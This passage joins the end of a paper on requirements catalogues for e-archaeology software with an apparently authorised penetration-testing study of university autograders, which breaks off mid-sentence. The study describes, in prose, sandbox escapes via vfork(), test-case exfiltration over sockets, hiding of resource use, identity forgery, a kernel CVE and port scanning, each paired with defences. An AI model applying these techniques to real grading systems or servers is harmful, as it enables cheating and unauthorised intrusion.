heritage in relation to cultural heritage. Since the theoretical framework for the Seville Principles is the London Charter, this document adopts the objectives approved by the Advisory Board of the London Charter. Both documents, the London Charter and the Principles of Seville, can be used as reqs sources for building SIREN catalogues as explained in the following section. 3 BASIS FOR AN E-ARCHAEOLOGY SYSTEMS SPL INFRASTRUCTURE The software factory (SF) concept (GREENFIELD & SHORT, 2004) refers to those software development organizations which can group together an important number of their products in the so called software product lines (SPL) (KÄKÖLÄ & DUEÑAS, 2006). Typically, SFs are able to systematize their production systems, mainly based upon reuse of a variety of artefacts (such as reqs, analysis or design models, code, and documentation). The current trend is towards SPLs in particular domains (such as banking or automotive fields). An SPL is defined by a set of systems sharing common features, which satisfy the specific needs of a particular sector. These systems are developed within the SPL from a pre-established set of assets or reusable artefacts. SPL development consists usually of two complementary processes: domain and product engineering. Reqs in a SPL define the common and variable features (domain level) as well as concrete products in such line (product level). Therefore, there is a process for building reusable catalogues (Domain Engineering) and another one for using them (Product Engineering). Although we define these processes sequentially, these are performed in an iterative and incremental way. The Domain Engineering process The activities in this group are carried out at the beginning of defining a new SPL and each time we wish to generate new catalogues within this SPL. Considering an SPL for computer-based visualisation of archaeological heritage, then a set of generic reqs catalogues of computer-based visualisation tools within the e-archaeology domain can be created: a) SPL Definition: A list of textual descriptions regarding high level issues which should be solved by means of the products of the SPL. Business processes potentially involved are also identified and textually described in a few paragraphs, to better describe a context. b) Problem Domain scope: In short, it consists of: b.1) Identifying main sources related to the domain to which the SPL belong: e-archaeology recommendations and guidelines, SE standards, legislation, problem-specific documents, etc. For example, the London Charter, the Principles of Seville and the ISO/IEC 25000 can be selected for the construction of a computer-based visualisation tool. Then, select, prioritize and schedule the generation of the detailed catalogues. b.2) Generating first version catalogues, for each one of the sources selected in the previous step. Typically, these will consist of a mapping from relevant text in the sources to software reqs, where common and variable features in the domain are described. Examples of reqs at this level are: S1. Digital preservation strategies should aim to preserve the computer-based visualisation data, rather than the medium on which they were originally stored, and also information sufficient to enable their use in the future, for example through migration to different formats or software emulation (Section 5.2, Principle 5: “Sustainability” from the London Charter). S2. The computer-based visualisation tool shall allow virtual recreation of archaeological heritage (Problem-specific domain document). c) Solution Domain scope: Generating detailed reusable reqs catalogues for each one of the sources selected. These catalogues will contain and refine the part of the reqs at the previous level, corresponding exactly to the kind of products provided by this SPL. Common and variable features, not just in the domain but in the particular SPL, are now described and detailed. Specific techniques, algorithms or procedures (even keeping variability) for implementing particular products in the SPL are now considered. Examples of refined reqs at this level are: C1. **The computer-based visualisation tool shall allow to preserve the computer-based visualisation data** (Refined from req S1; included in the London Charter catalogue). C2. **The computer-based visualisation tool shall store all the raw data and metadata to enable the migration of the computer-based visualisation data to [non empty set of file formats]** (Refined from req S1, with parameter [non empty set of file formats]; inclusive traceability relation with the req C1, that is, the reuse of C2 will imply the reuse of C1; included in the London Charter catalogue). C3. **The computer-based visualisation tool shall allow to use a virtual model to visually recover an archaeological site at a given moment in the past, including [non empty set of archaeological heritage]** (Refined from req S2, with parameter [non empty set of archaeological heritage]; included in the Computer-Based Visualisation Tool (CBVT) catalogue). At this point, reqs attributes such as identifier (e.g. C1), priority (e.g. high), source (e.g. Section 5.2, the London Charter) and person in charge (e.g. John) are incorporated. Both the reqs attributes and traceability relationships can also be reused. **The Product Engineering process** The activities in this group are carried out each time we wish to develop a new, specific e-archaeology product or evolve an existing one. For example, let us suppose that we intend to build a computer-based visualisation tool, addressed to landscape archaeology. The computer-based visualisation systems allow heritage experts to study landscape and to explore rich archaeological contexts. These systems collect data that can be useful in forming theory and rules of practice. Geophysical prospection is a good example of this, taking advantage of software that provides a host of data processing, georeferencing, and data display algorithms. As a result, landscape archaeology can use this technology to model a given landscape and move from data acquisition to content generation (CH’NG, 2011). **a) Product Definition:** Decide the main required features of the product (such as data acquisition, software quality, etc.), selecting them from a pre-defined form and providing weights within a homogeneous scale. This form identifies high-level abstraction functional and non-functional reqs, both archaeological and general purpose. For example, Sustainability: HLR1. Where digital archiving is not the most reliable means of ensuring the long-term survival of a computer-based visualisation outcome, a partial, two-dimensional record of a computer-based visualisation output, evoking as far as possible the scope and properties of the original output, should be preferred to the absence of a record, and Software quality: HLR2. Check that each test requirement is linked to a test case. A first specification, the so-called “Initial product specification”, including a prioritized list of main required features, is generated. **b) Select Sources and Catalogues:** Select the available catalogues related to features in the “Initial product specification”. For example, the available London Charter catalogue might be reused to describe how to store the visualisation outcome mentioned in HLR1. Then, for those features not considered in our existing repository of catalogues, identify related and applicable sources of interest. For example, when the complexity of the datasets captured is very high, the feature “The computer-based visualisation tool shall implement data mining techniques to analyse the visualisation data” is not in the SPL catalogues. In this case, information sources related with the data mining techniques should be selected. At this point, and according to the existing budget, we can decide either it is worthy to build new catalogues corresponding to these catalogues. features/sources (e.g. if they can be reused in further projects) or just to use the sources directly to obtain new reqs for our product requirements specification (PRS) (part of the so called deltas). c) Instantiate/Reuse reqs: By using the selected, available or newly built catalogues, obtain a first version of the PRS populated with reused reqs. Examples of product reqs at this level are: R1. The computer-based visualisation tool shall allow preserving the computer-based visualisation data (Used as it was in previous step). R2. The computer-based visualisation tool shall store all the raw data and metadata to enable the migration of the computer-based visualisation data to SVG (From parameterized req C2, with alternatives SMIL, SVG and X3D; the trace from R1 would also be instantiated). R3. The computer-based visualisation tool shall allow to use a virtual model to visually recover an archaeological site at a given moment in the past, including landscape (From parameterized req C3, with alternatives material culture, environment, landscape, customs, and general cultural significance). d) Elicitate reqs: Add to the PRS new, specific, reqs for this product (deltas). e) Analyse and Negotiate: Check possible inconsistencies and problems coming from the integration of reused and newly elicitated (deltas) reqs. Solve possible different views and interests of participating stakeholders. f) Validate & Verify reqs: To ensure the quality of the PRS created, check it to guarantee both that the resulting product will perform as expected in the user’s environment, and whole compliance with regard to the RE processes and standards used for the PRS (e.g. IEEE Std 830). Activities d, e, and f are typical of any RE process, while the others help to configure a specific e-archaeology SPL. Note that these steps are applied iteratively and incrementally until an approved PRS is achieved (the so called baseline). 4 CONCLUSIONS AND FUTURE WORK This approach aims at helping in the production of e-archaeology systems according to SE and RE best practices. Independently of any particular process model, our proposal can be integrated with common practices in organizations devoted to software development in the cultural heritage realm, just by adapting the structure of the reqs documents. Catalogues provide quality and a well-organized set of reqs, improving the related information from the original sources. The identification and selection of suitable sources of reqs for e-archaeology systems development is quite difficult, given that few standardisation initiatives have been taken so far. There is a need for further and more technically detailed guidance and regulation in computer-based visualisation in e-archaeology and related domains, since these efforts will provide the foundations for improving product quality and process productivity. The expansion and refinement of the guidelines included in the London Charter and the Seville Principles should be gradually addressed. Then, reqs catalogues can be created starting from the top priority and most used or more important sources (e.g. those that are mandatory, by law). The more catalogues we have in our repository, the better rates we will obtain both in productivity (reusing and instantiating reqs is faster than defining them from the scratch), quality (reused reqs are improved, potentially in each iteration) and interoperability (catalogues based upon standards). In the near future, we plan to define a taxonomy of cultural heritage systems, with the purpose of: (1) making easier the identification of common features/reqs for the different groups found; and (2) helping in deciding the direction to be taken with regard to the definition of the corresponding implementation guidelines and standards. ACKNOWLEDGMENTS This research is part of the project PEGASO-PANGEA (TIN2009-13718-C02-02), financed by the Spanish Ministry of Science and Innovation (Spain). REFERENCES
{"Source-Url": "https://polipapers.upv.es/index.php/var/article/download/4275/4435", "len_cl100k_base": 4559, "olmocr-version": "0.1.53", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 19535, "total-output-tokens": 5297, "length": "2e12", "weborganizer": {"__label__adult": 0.0005064010620117188, "__label__art_design": 0.0015115737915039062, "__label__crime_law": 0.0006346702575683594, "__label__education_jobs": 0.005767822265625, "__label__entertainment": 0.00010722875595092772, "__label__fashion_beauty": 0.0002582073211669922, "__label__finance_business": 0.0005412101745605469, "__label__food_dining": 0.0004208087921142578, "__label__games": 0.0006289482116699219, "__label__hardware": 0.0018911361694335935, "__label__health": 0.0005998611450195312, "__label__history": 0.004558563232421875, "__label__home_hobbies": 0.0001928806304931641, "__label__industrial": 0.0009541511535644532, "__label__literature": 0.0007238388061523438, "__label__politics": 0.00030112266540527344, "__label__religion": 0.0006227493286132812, "__label__science_tech": 0.12420654296875, "__label__social_life": 0.0001627206802368164, "__label__software": 0.028045654296875, "__label__software_dev": 0.82568359375, "__label__sports_fitness": 0.0002703666687011719, "__label__transportation": 0.0007081031799316406, "__label__travel": 0.0004892349243164062}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23952, 0.01404]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23952, 0.51706]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23952, 0.8759]], "google_gemma-3-12b-it_contains_pii": [[0, 2720, false], [2720, 6482, null], [6482, 10565, null], [10565, 14445, null], [14445, 18653, null], [18653, 22462, null], [22462, 23952, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2720, true], [2720, 6482, null], [6482, 10565, null], [10565, 14445, null], [14445, 18653, null], [18653, 22462, null], [22462, 23952, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23952, null]], "pdf_page_numbers": [[0, 2720, 1], [2720, 6482, 2], [6482, 10565, 3], [10565, 14445, 4], [14445, 18653, 5], [18653, 22462, 6], [22462, 23952, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23952, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b17738f904f01e228ad9f60f48ab9873d593aeac
Revenge for Late Nights: Penetration Testing of University Autograders Ian Pudney *University of Michigan* ipudney@umich.edu Ryan Wawrzaszek *University of Michigan* ryanwawr@umich.edu Austin Yarger *University of Michigan* ayarger@umich.edu Abstract Whether it be the promise of world-changing technologies or the allure of well-paying jobs, students are flooding into Computer Science programs at universities worldwide. Such an influx puts stress on traditional methods of assignment evaluation, and has led to an enhanced emphasis on autograding systems — software that takes student code and evaluates it automatically. In this paper, we analyze the potential for cheating or exploiting such autograders by investigating several real-world systems in use at the University of Michigan. We analyze the defense implemented by autograding systems and demonstrate vulnerabilities in several of them by mounting attacks ranging from privilege escalation to exfiltration of sensitive test cases. Our findings indicate that the most secure autograders adhere to a “defense in depth” strategy, relying on a combination of security mechanisms that include strict authentication, comprehensive logging, and the use of professionally developed open-source frameworks for sandboxing and containerization of untrusted code. 1 Introduction Academic cheating, a common result of procrastination and anxiety, manifests traditionally in many forms, including copying answers from another student, altering the gradebook, or obtaining exam solutions ahead of time key. As grading becomes more digital and automated, one must consider these threats in a new digital context, and how our technological approach to grading might be hardened against modern threats to academic integrity. In sections 2 and 3, we introduce the concept of autograders and establish a simple submission-evaluation model for autograding systems in general. In sections 5-8, we report on the architecture of four distinct autograders in use at the University of Michigan, discussing their strengths and weaknesses, and illustrating our attacks against them and potential defenses. We conclude by distilling some best practices and general security tips for autograder development in general. 2 Related Work Literature on autograder security is fairly rare, and many papers mention it only in passing [2]. However, a core requirement of autograders is the establishment of a sandbox for evaluation purposes, on which plenty of literature can be found [4, 3]. This paper investigates at a higher level, considering the use of sandboxes in autograder security, but not the low-level details of sandbox implementation. 3 Autograder Model The role of the typical autograder can be split into two primary tasks— the submission of code, and the evaluation of code. Both include distinct security challenges which are outlined in this section. In the discussions that follow, "student" refers to someone who submits code to an autograder for evaluation. 3.1 Submission A student looking to complete an autograded assignment must, at some point, submit that code to be graded. There are a few interesting points of investigation here; namely, Authentication (is the submission taking place on behalf of the proper student?), and Injection (is there something about the submission interface that allows for the unintended execution of scripts or code?). 3.2 Evaluation Upon submission, code must be compiled, executed, and evaluated. Autograders are unique in that foreign code injection and execution is expected. This presents an ideal situation for an attacker. Potential attacks can be mitigated by adhering to a few general principles. First, untrusted code should be run in a restricted environment with only the level of privilege necessary to complete the evaluation. Code should be run in a sandbox, and potentially dangerous system calls should be prohibited. Additionally, the party submitting code to the autograder should not be able to influence the evaluation process once it has begun. A student submitting for a grade has significant incentive to compromise the integrity of an evaluation; therefore, the student should not control the machine in which the autograding system executes. Finally, test cases, inputs fed to a student program to test for correct output and functionality, serve as a primary means of evaluation in autograding systems. Should test cases become publicly available, the integrity of the evaluation is compromised, as a student knowing the test cases may rely on hard coding outputs for specific cases, rather than developing a correct general solution. Therefore, test case exfiltration must be prevented. 4 Methodology A study of autograder security benefits heavily from access to production-level autograders. Our team received permission from the staff of four University of Michigan Computer Science courses to perform penetration tests against their autograders. In one of the courses, a dummy system was set up specifically for our testing. In another, we were given access to a virtual machine containing an instance of the autograder. In yet another, our team was allowed to penetration test the production autograder. To obtain these permissions, we agreed not to publish autograder source code or test cases. For the course in which we penetration tested the live autograder, we imposed our own restriction that we would not mount attacks if those attacks might disrupt autograder functionality for normal students. Prior to the presentation of our results, each course staff received a disclosure document outlining discovered vulnerabilities and giving detailed recommendations on how to fix them. 5 EECS 281 EECS 281 (Data Structures and Algorithms) is a course at the University of Michigan dedicated to writing efficient code. While merely getting the correct answer is sufficient for a perfect score in many classes, EECS 281 students must write correct code that adheres to strict time and memory limits, which many students struggle with. These efficiency limits, which are unique to this course, will be the focus of our investigation. 5.1 Submission Architecture Student code is compressed into a tarball (.tar.gz file) and submitted for grading via a web form. Submission results become available on the web form in real time as grading occurs. Results indicate whether the program output was correct, how much time and memory the submission used, the time and memory limits, and the program termination condition, such as a signal. If the student’s submission is incorrect, the web form also provides the student a small section of output that differs. 5.2 Evaluation Architecture After a student submits, their code is unpacked from the tarball, compiled, and run with various text inputs. Student code is not run directly as a child process of a grading script. Instead, it is run as child of a custom “jail” program, which uses chroot to restrict the execution of a student’s program to a particular directory and ptrace to disallow certain system calls. The ptrace API follows the POSIX standard for debugging, providing features such as breakpoints and signal catching. Upon receiving a submission, the jail script first forks a child, then, before that child runs the student executable, it attaches itself to the child via ptrace and notifies the jail whenever the student’s code makes a system call. If this call is not in the whitelisted set of system calls, the jail terminates the submission with an EPERM (“Operation not permitted”) signal. Once the student’s code has finished, the autograder compares its output to the expected output, typically with a simple diff. If the output is correct, the autograder computes the program runtime as the sum of the user and system time and computes the memory the program used as the maximum size of the valid portion of the program’s arena. These metrics are then used to compute the student’s score. 5.3 Exploitation Jailbreak Many interesting functions, such as fork() and clone(), are prohibited by the jail. vfork(), however, is not. vfork() is an optimized version of fork(), which creates a new process but shares the parent’s page table until either exit() or an exec-family function is called. If the child process does anything other than call one of those functions, its behavior is undefined. We were able to take advantage of this by using vfork() to create a child process that was not controlled by the jail and that could, therefore, make system calls which would otherwise be prohibited. This allowed for several interesting exploits that will be discussed below. **Test Case Exfiltration** The EECS 281 autograder runs student code with a variety of different inputs. It is imperative that these test cases remain secret, else students could cheat by simply hardcode their programs to give the correct output for each specific test. One way students could steal these test cases would be to submit a program that connects to a remote server controlled by the student and sends the test input to that server. To ensure these test cases remain secret, the EECS 281 autograder jail prevents students from accessing the network by prohibiting the `socket()` system call. However, after executing the jailbreak described in the previous section, we were able to upload such a specially crafted submission and exfiltrate the test cases from the autograder. **Computational Overhead Hiding** The EECS 281 autograder measures not just the correctness of student programs, but their runtime and memory efficiency as well. If a student could “offload” computation to somewhere other than the program being measured, they could circumvent the time and memory limits by making their program appear more efficient than it actually is. The Linux `time` operations account for time used by subprocesses, so simply spawning one child process using `vfork()` is not sufficient to accomplish this. However, it is possible to bypass this limitation. Our approach is described below, and a diagram is included in Figure 1, Appendix A: 1. The parent process opens a two-way pipe. 2. The parent process spawns a ”first intermediate” child process using `vfork()`. This causes the parent process to become blocked. 3. The first intermediate process spawns a ”second intermediate” child process using the normal `fork()` function, then begins waiting on the read end of the two-way pipe. 4. The second intermediate process spawns the ”worker” child process using `fork()`, then exits. 5. The worker process has its parent PID changed to 1, because its actual parent has died. Its time and memory usage will no longer be attributed to the original process. 6. The worker process spends as much time and uses as much memory as it likes, then writes the output to the write end of the pipe and exits. 7. The first intermediate process becomes unblocked when it receives data on the pipe. The time spent waiting on the pipe does not contribute to either user or system time. The intermediate process then stores the received data in memory which is shared with the parent process as a result of being spawned with `vfork()`. This process then exits. 8. The parent process is allowed to continue, and simply returns the data it finds in memory. Using this approach, we were able to convince the autograder that our submission met the time and memory restrictions, when, in fact, it ran hundreds of times longer than should have been allowed. **Memory hiding** Even without using the jailbreak, we were able to hide memory by depositing it into files or pipes. It is trivial for a student program to exceed memory limits by creating a temporary file or two-way pipe, then writing its memory into said file/pipe. The program can recover access to this memory simply by reading it back. This allows a student to hide some of their memory usage at the cost of additional system time. We successfully executed this attack using a pipe, and we believe it should work for normal files as well. **Blocking Persistence** The autograder measures user/system time, but not real time. This is sensible, as real time is unstable when the server is under load, whereas user and system time measure the actual amount of time the process is running. However, if a process is blocked, it contributes to neither user nor system time. This means that if a student accidentally or intentionally makes a blocking system call, the autograder will never kill their process, and their submission will become ”stuck”. We were able to achieve this by reading from a pipe that was never written to. **Known Vulnerabilities** The EECS 281 autograder runs a very old version of Linux which has known vulnerabilities (Linux g281-3.eecs.umich.edu 3.10.0-229.20.1.e17.x86_64 #1 SMP Thu Sep 24 12:23:56 EDT 2015 x86_64 x86_64 x86 64 GNU/Linux). We were able to cause a memory leak by exploiting CVE-2016-0728[1], and, with additional work, we believe we could gain root access and break out of the jail’s `chroot()`. 5.4 Defenses Short-Term Defenses Most of the serious vulnerabilities we discovered stemmed from the jailbreak technique we disclosed in section 5.3. These can be trivially fixed by removing `vfork()` from the whitelist of acceptable system calls. The jailbreak-free memory-hiding technique in section 5.3 stemmed from the ability to hide memory elsewhere. The specific techniques we used can be defended against by disallowing the `pipe()` system call and restricting or preventing the `open()` system call (or simply setting proper file permissions in the `chroot` jail). To fix the blocking persistence bug, the autograder should kill processes after they exceed a certain amount of real time. Using user/system time is preferable for grading student submissions, but we suggest a maximum real-time cutoff as well. This limit should be several times longer than the user+system time. Long-Term Defenses The EECS 281 autograder seeks to properly measure the time and memory usage of student programs, and the jail provides a strong defense against cheating at those goals. However, custom-made security systems frequently have serious vulnerabilities like the ones we described above. We recommend that 281 keep its current jail implementation, but would encourage them to also install commercially-available, open-source security applications, such as Docker, that are specifically designed to contain the execution of untrusted code. We also recommend that the 281 staff make use of built-in Linux security systems, such as process resource limits, and that they install a firewall to prevent student code from connecting to any address other than localhost. Finally, we recommend that the EECS 281 staff keep their autograder's operating system up-to-date, so that students cannot exploit publicly known vulnerabilities. 6 EECS 370 EECS 370 (Introduction to Computer Organization) is a required introductory hardware course for Computer Science students. Typical course projects include assembly programs, processor simulators written in C, and other hardware-related programs. 6.1 Submission Architecture Submission occurs by way of a publicly-available perl script. This script packages student files, obtains the identity of the current user, and sends the source code to the autograder via unencrypted email. The acquisition of the session username is of particular interest, as the username included in the email’s FROM header represents the one and only means of server-side user identification. Because the submission script runs on the client side, the username may be trivially forged. 6.2 Evaluation Architecture When the autograder receives an email, the submission is forwarded to a perl script responsible for evaluation. The student code is compiled, and a "student process" is spawned. This student process runs with the same privilege as the autograding script (ability to use various system calls), and a 30 second cpu time limit is enforced to prevent autograder hangups. The student program is fed test cases, and its output is verified against expected output from an instructor-developed solution. 6.3 Exploitation Impersonation The submission process for the EECS 370 autograder involves no authentication. The student has complete influence over the submission script, and may trivially alter them to forge an identity of their choosing. We successfully mounted such an attack, impersonating other members of our pen-test team. This exploit could be used to sabotage other students by spending their late days (currency that allows a student to submit an assignment late) or by delivering malicious payloads under their name. Test Case Exfiltration As with the EECS 281 autograder, we were able to successfully exfiltrate test cases. The task was trivial in this case, as there are no system call restrictions on the student-code process and no firewalls to prevent a socket from being opened to an external server. Logging defenses present no issue due to the ease of impersonating other users, as described above. The privilege and lax limits placed on the student process could, beyond mere exfiltration, allow a student to damage the autograder in an attempt to delay a project deadline. 6.4 Defenses Web-Interface Based authentication Most universities provide a web-based means of authentication, such as that found at `weblogin.umich.edu`, that governs access to a variety of university systems. Such centralized authentication systems are typically maintained by dedicated teams, and tend to be more robust and better-tested than homemade counterparts such as the EECS 370 submission script. Professionally maintained systems such as these increase security by removing the authentication process from the student’s sphere of influence. Policy-based protection EECS 370 assigns project grades based on each student’s highest scoring submission. While this does not provide a defense against the attacks described above, it does prevent malicious users from sabotaging a student’s grade by submitting broken or low-scoring code under the victim’s name near the project deadline. Proper Sandboxing of Foreign Code Student submitted code is compiled and executed with an unnecessarily high level of privilege. As stated in our analysis of the EECS 281 autograder, a proper sandbox comprised of firewalls, process limits, and filesystem isolation would reduce the potential destructive capability of untrusted code. 7 EECS 280 EECS 280 (Programming and Introductory Data Structures) is the second programming course students take at the University of Michigan. In it, students write C++ programs on topics such as recursion, object-oriented programming, and dynamic memory management. 7.1 Submission Architecture Students submit source code files via a Django-based web form. After submitting, students see tests with descriptive names, and whether they passed those tests or not. Not all test results are revealed to students. Some test cases provide additional output regarding whether the student leaked memory, which may affect the final grade. The use of Django in the autograder’s web-interface prevents the web developer from writing any SQL code, thus protecting against some forms of injection. 7.2 Evaluation Architecture When a student submits code, the code is extracted from the input form, compiled, and run with a variety of inputs. The code is run inside a Docker container configured to have no external network stack and an NPROC limit of zero, i.e., the code cannot create processes. The container may also be configured to prevent opening and closing of files, depending on the test. Processes exceeding a set limit on wall clock time are terminated with kill -9. Output is then checked for correctness outside the container, and results are sent back to the student. 7.3 Exploitation We discovered only minor vulnerabilities in the EECS 280 autograder. These are discussed below. Memory Leak Hiding Some EECS 280 test cases deduct points if they detect a memory leak in student code. This is measured with Valgrind, which reports a leak if a block of allocated memory has not been freed when a program exits. This method can only detect a subset of memory leaks, failing to detect memory that is deleted before the program exits but is retained longer than needed. Therefore, we were able to construct a submission which automatically frees all allocated memory when the program ends, even if the student does not write a main() function and, therefore, does not have control over when the program ends. We believe EECS 280 students have sufficient skill to mount this attack. Known Vulnerabilities The EECS 280 autograder uses a fairly new Linux version: Linux eecs280-VirtualBox 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux. Therefore, it is safe from most known kernel exploits, but it is still susceptible to CVE-2016-0728, with the same ramifications as described in section 5. 7.4 Defenses Short-Term Defenses Defending against the memory leak attack requires a different method of measuring leaked memory. Instead of looking for memory which remains leaked at the end of the program, the autograder should enforce the following rule: while the number of objects allocated by the autograder remains bounded, the amount of memory used by those objects must also remain bounded. Consider how this rule could be applied if the student’s assignment involved creating a class which allocates memory in its constructor and deletes it in its destructor. The autograder can repeatedly create and destroy instances of that class. If the memory in use by the program continues to increase over time, then the autograder has detected a memory leak. We recommend implementing this detection method, but we do not recommend removing the Valgrind-based leak check, as it provides easily de-bugged feedback to students. To defend against the kernel-based privilege escalation, we recommend that the autograder operating system be frequently updated, at least with regards to security-sensitive patches. Long-Term Defenses Because the EECS 280 autograder already implements the defense mechanisms we recommend for secure autograder implementation, and because we found no serious vulnerabilities, we have no recommendations for long-term changes to the this system. Instead, we simply recommend that the autograder infrastructure be kept up-to-date and security patches be applied in a timely fashion. 8 EECS 485 EECS 485 (Web Databases and Information Systems) is a web development class in which several early projects require students to build a photo sharing website. The projects integrate a Python Flask/MySQL back end with a front end that uses Jinja templates and JavaScript. 8.1 Architecture EECS 485 uses the same autograder software as EECS 280. Therefore, it has the same exceptional level of security against malicious student code. However, EECS 485 has a very different submission and evaluation architecture. In EECS 280, students submit files to be compiled and run on a separate server. In EECS 485, however, students run public facing websites on an assigned port of a university-provided server, which hosts several student groups. In order to prevent theft or sharing of code, students only have read and write permissions in their assigned directory on the server. When a student wishes for their project to be evaluated, they submit a request to the autograder, rather than submitting their code to be run on an external server as in the previously discussed models. The autograder then issues a series of requests corresponding to hidden test cases, evaluates the responses provided by the student site, and returns a summary of which tests the submission passed/failed. This project structure provided an additional attack surface not present in the EECS 280 model and allowed us to successfully mount a variety of attacks ranging from exfiltration of test case details to stealing code written by other students. 8.2 Exploitation Exposing Student Code EECS 485 students run their servers on remote machines, with several groups assigned to each machine. While students do not have read access to other groups’ directories, the hosted websites are public facing, so anyone with the URL could easily navigate to another student’s site and access their HTML and JavaScript files. Because the URLs are fixed for each project, it would be a simple matter for a student to scan the server for active ports and access another group’s site. To prevent this, each student group is provided with a “secret key” comprising 20 hexadecimal characters that must be included in the URL for each page on their site. The key space is $2^{80}$, which makes a brute force attack infeasible, even if the port number is known. While URLs that point to dynamically generated content are protected by this “secret key” system, static files, such as images and, more importantly, JavaScript files, are served from a directory whose file path does not contain this secret string. Therefore, a student can mount a fairly simple attack by running a port scan on the server to determine which ports are open, then searching under /static/js/ for common file names such as main.js or app.js. Additionally, if a student site uses the base HTML template provided by the course staff to serve pages for invalid URLs, the static files will be served on the 404 page, removing the burden of guessing the JavaScript filename. Furthermore, these JavaScript files frequently contain asynchronous calls to controller methods whose URLs contain the secret string, allowing an attacker to gain full access to the front end of another group’s site. In order to test the validity of this attack without running a port scan on the EECS 485 server, one member of our team set up a personal server and hosted a dummy website on a randomly selected port, using a file structure analogous to that used in an EECS 485 project. A second team member, given only the domain name of the site, was able to determine the port number, access the JavaScript, and acquire the secret string. Port Squatting The autograder assigns each group a particular port to use for running their server. Because multiple groups share the same server, port squatting becomes a serious issue. Because a process cannot bind to a port which has already been bound, any student with access to the server may block another group’s submission by binding their server to that group’s port. This is a particularly concerning issue, since students could leverage this to prevent other groups from submitting. Furthermore, it would be difficult to prove malicious intent, as the student blocking the port could claim that they had done so accidentally. Additionally, if one member of a group runs a server on their group’s port, the other students in the group will be unable to submit until that server is shut down. 8.3 Request Logging EECS 485 is unique among the autograders we tested in that students control the directory in which their code executes during the grading process. Therefore, a student could easily log requests made by the autograder to a local file during grading. This represents a partial leak of test cases, as a student is able to record requests sent to their server by the autograder, although never the correct behavior that the autograder is checking for. We can see no simple way to definitively protect against this attack, other than running student code directly on the autograder machine. The scope of this vulnerability could be limited by not running certain tests until after the submission deadline, but this both inconveniences students by obscuring their full grade, and provides only a short-term solution, as a student could record the test cases to distribute to students who take the course in subsequent terms. 8.4 Defenses The exploit that allowed students to circumvent the secret key system by examining static files can be remedied by requiring students to serve their static content from paths that include the secret string. Flask’s ”send from directory” function provides one simple way to do this. There are a few ways to solve the intra-group port squatting problem. One solution is to assign port numbers to each student, rather than to each group; another is to provide only a single user account per group, rather than independent user accounts per student, so that one student can kill the server of another student in the group and reclaim their port. Solving the inter-group problem is somewhat harder. Linux provides no built-in way to restrict which ports a particular user can open (beyond the well-known-ports restriction). One solution is to run each group’s code in a Docker container (or VM) and to publish only the appropriate port on the container. There is, however, a solution that solves both problems. Rather than assigning ports to each group, let a student pick any port and specify their chosen port upon submission. This would prevent any other users from squatting on their port, as they could simply choose another. We originally worried this would allow a malicious student to submit the port for another student’s site, thereby claiming credit for the victim’s work. However, the secret strings described previously would prevent this. This change requires minimal modification to the existing autograder; therefore, this is the solution we recommend. 9 Discussion and Conclusions This section will serve primarily as a resource for instructors wishing to implement autograders for their own courses. We observed serious vulnerabilities in three of the four autograders we surveyed. The one without serious vulnerabilities, EECS 280, was written from the ground up with security as a primary concern and implements modern defenses. Thus, we will use it as our model of a strong, well-sandboxed autograder. 9.1 Defense in Depth "Defense in Depth" is a classic military idea promoting the benefits of multi-layer defense as opposed to one-layer defense. Additional layers of security provide redundancy, such that the failure of one layer doesn’t compromise the entire system. We were able to bypass a single layer of defense on many of the autograders; our attacks may have been thwarted with the presence of multiple layers. The jail implemented in the EECS 281 autograder is certainly a useful system, but once we broke free of the jail, we were able to execute arbitrary code with the same permissions as the autograder process. Had the autograder implemented a firewall in addition to the jail, we would have been unable to exfiltrate test cases. Had Linux process limits been used, we would have been unable to fork processes, which would have prevented us from breaking the jail in the first place. Each of these security elements provide valuable defenses, but implementing them all together minimizes the damage that can be done in the event that one component fails. We strongly recommend that autograders rely not just on their own custom security systems, but on firewalls, containerization, and well-configured process limits in combination. Our inability to break the EECS 280 autograder, which implements all these defenses, is a testament to the effectiveness of the ”defense in depth” strategy. 9.2 Professional / Open-Source Defenses Problems frequently occur when individuals attempt to create their own security software. This does not imply that these developers are incompetent. Rather, it speaks to the difficulty of implementing sound security measures with limited resources, a situation not uncommon for course staffs developing autograders. Their efforts are typically split between development, teaching, and research, and they simply do not have the time to perform a comprehensive security analysis of their autograding systems. The value of having many eyes examine a system (in the case of open source) or a dedicated team to develop and review security software (in the case of a professional product) cannot be overstated, as this increases the odds of successfully detecting vulnerabilities and results in hardened and well-tested systems. This paper serves as an example of how even competently designed custom systems, such as the EECS 281 autograder, can contain subtle but serious vulnerabilities, while EECS 280, which relied on thoroughly tested defenses such as Docker, firewalls, and built-in Linux security measures, resisted all our exploitation efforts. Thus, we strongly recommend that autograder developers choose to use open source or professionally developed security frameworks and defenses, rather than implementing custom solutions. 9.3 Detection A distinguishing characteristic of the autograder model is that submissions are tied to a student’s identity. If a student wishes to cheat, they need not only exploit flaws in the autograder, but also do so without being detected. Logging and notification mechanisms, then, are invaluable security tools. The jail in the EECS 281 system, for example, 